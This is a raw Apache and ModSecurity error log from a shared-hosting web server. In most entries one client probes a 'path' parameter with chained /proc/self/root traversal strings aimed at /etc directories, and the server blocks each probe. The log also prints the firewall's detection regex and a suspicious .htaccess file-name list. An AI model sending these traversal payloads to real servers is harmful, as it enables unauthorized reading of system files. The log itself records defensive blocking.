[Thu Mar 19 08:21:45.705453 2026] [core:alert] [pid 31803:tid 140411607643904] [client 74.7.243.128:38832] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/opt/bacula
[Thu Mar 19 08:21:57.057814 2026] [proxy_fcgi:error] [pid 26799:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:33420] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:22:11.573629 2026] [access_compat:error] [pid 17887:tid 140411733534464] [client 216.73.216.191:59374] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/goods.php
[Thu Mar 19 08:22:20.130415 2026] [proxy_fcgi:error] [pid 15826:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:33986] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:22:26.601570 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.243.128:33368] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvccgkwaGbbGflqUZCppQAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 08:22:41.121885 2026] [proxy_fcgi:error] [pid 14269:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:34594] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:22:51.740833 2026] [:error] [pid 19093:tid 140411733534464] [client 74.7.243.128:36764] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvci1_V7PWP6ixUYl6qOQAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:23:03.095636 2026] [proxy_fcgi:error] [pid 26799:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:35256] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:23:08.243742 2026] [:error] [pid 27293:tid 140411674785536] [client 74.7.243.128:56872] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvcnP-YZRR_7pZ7nDJ6fQAAA8g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 08:23:25.070916 2026] [proxy_fcgi:error] [pid 27403:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:35784] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:23:50.133770 2026] [proxy_fcgi:error] [pid 19093:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:36402] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:24:12.910860 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:40140] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvc3OoXxyEfFpUF8f_8YQAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:24:17.121820 2026] [proxy_fcgi:error] [pid 30077:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:37090] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:24:22.707520 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:52974] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvc5ta6ubjKNq_cu4Y62wAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:24:34.009819 2026] [mime_magic:error] [pid 17887:tid 140411683178240] (70014)End of file found: [client 57.141.18.86:39040] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 08:24:44.029797 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:37666] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:24:54.307426 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.243.128:56698] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvdBuoXxyEfFpUF8f_8ggAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:25:06.514997 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.243.128:49602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvdEgkwaGbbGflqUZCqVQAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:25:13.125800 2026] [proxy_fcgi:error] [pid 19093:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:38324] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:25:41.755652 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:53748] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvdNfu8EFLIOrSqIpuP7wAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:25:44.633797 2026] [proxy_fcgi:error] [pid 19093:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:38976] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:25:47.907393 2026] [:error] [pid 19093:tid 140411725141760] [client 74.7.243.128:50246] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvdO1_V7PWP6ixUYl6qdAAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 08:26:12.121800 2026] [proxy_fcgi:error] [pid 17887:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:39638] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:26:39.126124 2026] [proxy_fcgi:error] [pid 27403:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:40324] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:27:03.989921 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:40818] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:27:21.093324 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.228.61:45378] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvdmQkwaGbbGflqUZCqqwAAANE"]
[Thu Mar 19 08:27:22.795676 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.243.128:52860] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvdmvu8EFLIOrSqIpuQSQAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 08:27:28.583747 2026] [:error] [pid 17653:tid 140411641214720] [client 74.7.243.128:59898] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvdoMdf6f5d65gmYZRiSQAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 08:27:29.125773 2026] [proxy_fcgi:error] [pid 17887:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:41406] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:27:33.040984 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:38858] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvdpeyqAr6etmhZHNpQQAAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:27:41.751174 2026] [:error] [pid 27403:tid 140411691570944] [client 74.7.243.128:38868] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvdrRkFeYa1D6dYQnDdrAAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 08:27:51.049818 2026] [proxy_fcgi:error] [pid 27293:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:41882] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:28:09.168858 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.243.128:44044] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvdyQbLMZ6AikZjR9VKxQAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:28:13.129855 2026] [proxy_fcgi:error] [pid 27403:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:42344] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:28:37.129801 2026] [proxy_fcgi:error] [pid 30077:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:42882] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:29:00.136748 2026] [proxy_fcgi:error] [pid 26799:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:43446] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:29:23.137777 2026] [proxy_fcgi:error] [pid 19093:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:43994] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:29:47.169833 2026] [proxy_fcgi:error] [pid 17653:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:44666] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:30:02.097515 2026] [core:alert] [pid 27293:tid 140411624429312] [client 57.141.18.123:47054] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 08:30:03.395819 2026] [core:alert] [pid 27293:tid 140411599251200] [client 57.141.18.31:47074] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> without matching <IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> section
[Thu Mar 19 08:30:11.125812 2026] [proxy_fcgi:error] [pid 27293:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:45210] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:30:17.016449 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.243.128:34288] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abveSQkwaGbbGflqUZCrHwAAAMk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:30:27.753408 2026] [mime_magic:error] [pid 17653:tid 140411683178240] (70014)End of file found: [client 57.141.18.118:47084] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 08:30:38.129925 2026] [proxy_fcgi:error] [pid 17653:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:45796] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 08:31:03.506057 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:50200] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abved9a6ubjKNq_cu4Y7yAAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 08:31:04.145818 2026] [proxy_fcgi:error] [pid 17653:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:46374] AH01075: Error dispatching request to : (polling)
